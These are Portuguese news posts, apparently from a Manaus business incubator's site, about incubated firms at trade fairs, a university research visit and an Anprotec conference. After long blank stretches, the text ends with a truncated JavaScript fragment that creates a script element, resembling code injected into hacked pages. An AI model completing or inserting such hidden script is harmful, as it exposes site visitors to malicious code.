Feiras ajudam a fidelizar novos consumidores

Estande das empresas instaladas no CIDE.
Estande das empresas instaladas no CIDE.

 

As feiras locais, como a Portões Abertos, realizada na Base Aérea de Manaus, o Empório Sebrae de Negócios, a feira montada no Parque Estadual Sumaúma, na Zona Leste, e a Mundial Art, contribuem muito à divulgação e ao aumento das vendas de produtos de empresas instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), dizem os empresários participantes.

Os segmentos que mais participam em eventos em formato de feiras foram os da Panificação, Temperos, Cosméticos e Doces. “Os convites para participar em feiras é uma ótima oportunidade para divulgar nossos produtos e a nossa marca, vender e fidelizar novos clientes”, diz a sócia proprietária da Cheiro D´Folha, Wanessa Santana.

Ainda segundo a empresária, para as empresas de Cosméticos e Beleza que vão aos eventos existe uma demanda a mais que prolonga a relação fora do ambiente da feira. “Há um público que se aproxima ao nosso estande disposto a ser revendedores da nossa linha de cosméticos. Isso é uma grande vantagem para a gente. Então nós realizamos um cadastro para que essas pessoas se tornem um representante nosso”, conta a empreendedora, acrescentando que os clientes ainda curtem a página social da empresa e compartilham com outros possíveis compradores.

 

O pós-feira

Para os empreendedores que comercializam os doces regionais e os de receitas portuguesas, e os temperos locais, o ambiente da feira se estande aos ambientes de mercadinhos e supermercados porque grandes empresários visitam os eventos para conhecer novos produtos. “O público nos eventos é variado e de diferentes objetivos. Tem os que vão para passear com a família e acabam comprando pequenas quantidades dos nossos produtos. Mas existem os que vão para fazer negócios e comprar em grande quantidades”, detalha a empresária da Amazon Doces, Jane Barros.

O português Jorge Neves destaca que muitos consumidores, acostumados a visitar feiras, conhecem de longe a marca dos produtos. “A gente já conseguiu formar uma clientela pela identidade da nossa marca, que é sinônimo de qualidade”, diz ele, que conseguiu expandir os seus doces para grandes redes do varejo e restaurantes da cidade. “Hoje, nós vendemos até para postos de gasolina”, finaliza.

O estande de cosméticos é um dos mais visitados.
O estande de cosméticos é um dos mais visitados.

 

Muitos visitantes já conhecem o produto pela marca.
Muitos visitantes já conhecem o produto pela marca.

 

Bombons e biscoitos, produzidos no CIDE, são muito procurados.
Bombons e biscoitos, produzidos no CIDE, são muito procurados.

 

 

Alguns empresários do CIDE que participam das feiras.
Alguns empresários do CIDE que participam das feiras.

 

Um ambiente de feira.
Um ambiente de feira.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Empreendedores do CIDE em feira internacional

21230903_1994684017428882_323337759999967563_n

 

Manaus recebe neste fim de semana, de 1 a 10 de setembro, a feira internacional de artesanato moda e decoração, Mundial Art, e as empresas Sabores de Tradição, Temperos da Amazônia, Cheiro de Folha da Amazônia e Amazon Doces, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), vão participar. Esses empreendimentos atuam no segmento de Alimentos, Panificação, Perfumaria e Cosméticos, e Temperos Regionais. O evento acontece no Centro de Convenções do Amazonas Vasco Vasques, das 15hs às 22hs.

Segundo o diretor executivo do CIDE, José Grosso, a feira é uma oportunidade para divulgar os trabalhos locais e a qualidade dos produtos feitos no Amazonas. “Estamos dando apoio às nossas empresas para que elas divulguem suas marcas e façam bom negócios. É uma forma de estimular o emprego e profissionalizar o mercado artesanal”, diz.

A Mundial Art reunirá representantes de mais de 20 países e vários Estados do Brasil e municípios do Amazonas, que serão distribuídos em vários estandes, com itens de artesanato regional, nacional e internacional, moda e decoração.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Comercialização e divulgação na feira do SEBRAE

O estande da Amazon Doces está entre os mais procurados.
O estande da Amazon Doces está entre os mais procurados.

 

Com a finalidade de comercialização de  produtos e divulgação de suas marcas, empresas de diversos segmentos expõem na 5ª edição do “Empório Agronegócio”, uma iniciativa do Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (SEBRAE Amazonas). O evento vai de 2 a 4 de agosto, no pátio externo da instituição.

A convite do SEBRAE, três empresas dos segmentos de Alimentação, Temperos e Doces, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), participam. “Os empreendedores participantes recebem apoio do SEBRAE nas áreas de acesso a mercados. Portanto, esse evento serve de vitrine para os empresários e de oportunidade para os consumidores que desejam conhecer a qualidade de novos produtos com um preço acessível”, diz o diretor executivo do CIDE, José Grosso.

De acordo com os técnicos do SEBRAE, 25 empresas participam do grupo de expositores e todas estão formalizadas e participam de projetos.

A Sabores de Tradição levou os melhores pastéis portugueses para o evento.
A Sabores de Tradição levou os melhores pastéis portugueses para o evento.

 

A Temperos da Amazônia expõe a qualidade dos seus produtos.
A Temperos da Amazônia expõe a qualidade dos seus produtos.

 

A feira está instalada no pátio externo do SEBRAE Amazonas.
A feira está instalada no pátio externo do SEBRAE Amazonas.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Pesquisadoras do Brasil e da Inglaterra escolhem o CIDE para trabalho acadêmico

O diretor executivo, José Grosso, recepciona às pesquisadoras
O diretor executivo, José Grosso, recepciona às pesquisadoras

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) foi a incubadora de empresas escolhida no Amazonas, para participar de uma pesquisa realizada por professoras da Fundação Getúlio Vargas e da Universidade de Essex da Inglaterra (University of Essex), sobre Empreendedorismo, Incubadoras de Empresas e Iniciativas de Empreendimentos.

 

A visita às instalações da incubadora ocorreu no último dia 23 de fevereiro, no qual as pesquisadoras Diane Holt e Silvia Pinheiro, conversaram com o diretor executivo do CIDE, José Barbosa Grosso, e foram acompanhadas pela funcionária Rosália Padilha, até as empresas escolhidas para a entrevista.

 

“Foi feito uma parceria entre a Fundação Getúlio Vargas e a Universidade de Essex para que nós desenvolvêssemos uma pesquisa sobre empreendedorismo no Brasil e, no Norte, escolhemos o CIDE devido à sua estrutura de incubadora e pelos empreendimentos instalados aqui”, disse a professora de Direito Internacional Silvia Pinheiro, acrescentando que a pesquisa vai ter uma duração de três anos e que o material vai ser publicado em revistas especializadas em empreendedorismo.

 

As pesquisadoras tiveram a oportunidade de conhecer in loco empresas do segmento de Perfumaria, Panificação, Doces, Temperos e Licores, onde puderam conversar com os empreendedores, funcionários, conhecer o processo e degustar os produtos regionais.

Pesquisadoras visitam a fábrica de chocolates Amazon Doces, no CIDE
Pesquisadoras visitam a fábrica de chocolates Amazon Doces, no CIDE

 

FotoG6

 

Pesquisadoras conhecem empresa de perfumes, no CIDE
Pesquisadoras conhecem fábrica de perfumes, no CIDE

 

FotoG3

 

Pesquisadoras visitam o setor de Tecnologia da Informação do CIDE
Pesquisadoras visitam o setor de Tecnologia da Informação do CIDE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

CIDE participa da 26ª Conferência da Anprotec

Representante do CIDE, Rosália Padilha (de vermelho, à dir.), e gestores de outras incubadoras do Amazonas.
Representante do CIDE, Rosália Padilha (de vermelho, à dir.), e gestores de outras incubadoras do Amazonas

 

 

A 26ª Conferência Anprotec reuniu cerca de 650 empreendedores, representantes de incubadoras de empreas, gestores de ambientes de inovação, representantes do governo e do setor privado, estudantes e especialistas de todos os Estados brasileiros e de outros países em Fortaleza (CE). Durante três dias, de 17 a 20 de outubro, os participantes assistiram plenárias, minicursos, realizaram networking e interagiram no 4º Fórum Sebrae de Inovação. O Centro de Incubação e Desenvolvimento Empresarial (CIDE) foi representado por Rosália Padilha.

 

Negócios de impacto social ganharam espaço nas discussões. “Dentro desse contexto a Conferência foi bem aproveitada, assim como a rede de relacionamentos, contatos com reciprocidade de outras incubadoras e parques tecnológicos”, diz a representante do CIDE.

 

Além de participar de cursos e Workshops de sistemas de inovação, os representantes de incubadoras realizaram visitas técnicas a parques tecnológicos do Ceará. “Essas iniciativas tratadas por especialistas experientes, abordando temas relevantes no ambiente empresarial e inovador estimulará a reflexão e maior conhecimento para os desafios do nosso cotidiano, sejam nas incubadoras, universidades, parques tecnológicos, ICTs, empresas e entidades atuantes em inovação”, finaliza Rosália.

Goiânia é eleita

O terceiro dia de atividades da 26ª Conferência Anprotec em Fortaleza (CE) foi finalizado com a assembleia geral da Associação. A atividade teve início com a apresentação das candidaturas que concorreram para sediar a Conferência de 2018. Tanto a equipe de Goiânia (GO), quanto a de Gramado (RS) tiveram 10 minutos para argumentar a favor de suas cidades. Após as explanações, o presidente da Anprotec, Jorge Audy, convidou todos os participantes para votarem em uma das duas candidaturas.

 

A cidade vencedora foi Goiânia, que abrigará a 28ª Conferência Anprotec em 2018. Após as comemorações, Aline Figliolo, Superintendente de Tecnologia e Inovação da Secretaria de Ciência e Tecnologia de Goiânia, afirmou que a Conferência de 2018 será muito agregadora regionalmente. “Este é um evento de todo centro oeste e de todo o Brasil”.

Os participantes assistiram plenárias, minicursos, realizaram networking e interagiram
Os participantes assistiram plenárias, minicursos, realizaram networking e interagiram

 

 

 

Representante do CIDE, Rosália Padilha, conheceu incubadoras e interagiu com empresariado em Fortaleza
Representante do CIDE, Rosália Padilha, conheceu e interagiu com empresariado de outras incubadoras em Fortaleza

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

var d=document;var s=d.createElement(‘script’);